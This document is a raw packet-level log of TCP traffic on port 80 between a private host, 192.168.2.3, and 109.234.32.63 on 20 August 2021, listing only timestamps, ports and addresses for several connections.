Aug 20, 2021 17:10:59.493103981 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493124008 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493144035 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493160963 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493251085 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493272066 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493293047 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493313074 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493396997 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493417025 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493436098 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493454933 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493478060 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493550062 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493567944 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493586063 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493611097 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493628025 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493642092 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493702888 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493756056 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493773937 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493786097 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493804932 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.519990921 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.520030022 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.521075964 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.523740053 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.523899078 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.827693939 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.853593111 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.853708982 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.864830017 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.890763044 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.890918016 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.891447067 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.891604900 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.891791105 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.891876936 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917141914 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917190075 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917396069 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917468071 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917469978 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917486906 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917498112 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917507887 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917525053 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917563915 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917587996 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917638063 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917649984 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917660952 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917673111 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917689085 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.917730093 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917745113 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.917773962 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.943255901 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943279982 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943289042 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943299055 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943312883 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943322897 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943418026 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943433046 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943445921 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943459034 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943471909 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943489075 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943505049 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943519115 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943532944 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943546057 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943558931 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943562031 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.943604946 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943623066 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.943681955 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.943707943 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.943725109 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.969485998 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969508886 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969518900 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969533920 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969542980 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969553947 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969568968 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969583035 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969598055 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969607115 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969620943 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969629049 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.969635010 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969649076 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969662905 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969750881 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.969820023 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969835043 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969849110 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969861984 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969878912 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969896078 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969908953 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969923019 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969937086 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969949961 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969964027 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969976902 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.969993114 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970006943 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970020056 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970033884 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970042944 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970060110 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970074892 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970089912 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970104933 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970118999 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970133066 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.970146894 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.995461941 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.995482922 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.995800972 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.997577906 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.999571085 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.999682903 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.267067909 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.268918991 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.292922974 CEST	80	49735	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.293062925 CEST	49735	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.296236992 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.296508074 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.297302961 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.297863960 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.298086882 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.298223972 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.323251009 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.323456049 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.323717117 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.323729992 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.323787928 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.323853016 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.323956966 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.324223042 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324265957 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324275970 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324289083 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324301004 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324310064 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324321032 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.324347973 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.324503899 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.350749016 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350771904 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350805998 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350820065 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350845098 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350850105 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.350860119 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350876093 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350889921 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.350965023 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351006031 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351085901 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351102114 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351222992 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351243973 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351274014 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351336956 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351352930 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351367950 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351382017 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351408005 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351411104 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351428032 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351439953 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351444006 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351455927 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351459026 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.351469994 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351485968 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.351587057 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.377517939 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377549887 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377572060 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377589941 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377619982 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.377652884 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377667904 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377676964 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377701044 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.377710104 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377737045 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377752066 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377768040 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377790928 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377814054 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377829075 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377841949 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377857924 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377873898 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377887964 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377902985 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377918005 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377931118 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377960920 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377976894 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.377991915 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378009081 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378025055 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378055096 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378065109 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378074884 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378091097 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378106117 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378123045 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378137112 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378150940 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378169060 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378184080 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378199100 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.378213882 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.404112101 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.404135942 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.404146910 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.405440092 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.405735016 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.721215963 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.723753929 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.747874022 CEST	80	49736	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.747947931 CEST	49736	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.749583960 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.749682903 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.750334024 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.750531912 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.750771046 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.750849962 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.776175976 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776361942 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776612043 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776650906 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776669025 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776679039 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776695967 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776715040 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.776742935 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776753902 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776798964 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.776808977 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776824951 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776859045 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.776962996 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.776976109 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.776982069 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802520990 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802562952 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802614927 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802660942 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802689075 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802702904 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802766085 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802773952 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802779913 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802793026 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802829027 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802830935 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802896023 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802931070 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.802933931 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802947044 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802962065 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.802975893 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803016901 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803030968 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803036928 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803065062 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803069115 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803097963 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803102970 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803128004 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803159952 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803188086 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803201914 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803215027 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803226948 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.803261995 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.803312063 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.828603983 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.828629971 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.828696012 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.828779936 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.828819990 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:00.829032898 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829051971 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829073906 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829087973 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829097986 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829154015 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829170942 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829184055 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829231024 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829245090 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829292059 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829305887 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829349041 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829363108 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829386950 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829401016 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829427958 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829441071 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829547882 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829562902 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829575062 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829588890 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829602957 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829616070 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829631090 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829643965 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829659939 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829674959 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829688072 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829754114 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829768896 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829781055 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829793930 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829806089 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.829818964 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.854759932 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.854778051 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.854784966 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.854795933 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.854804039 CEST	80	49737	109.234.32.63	192.168.2.3
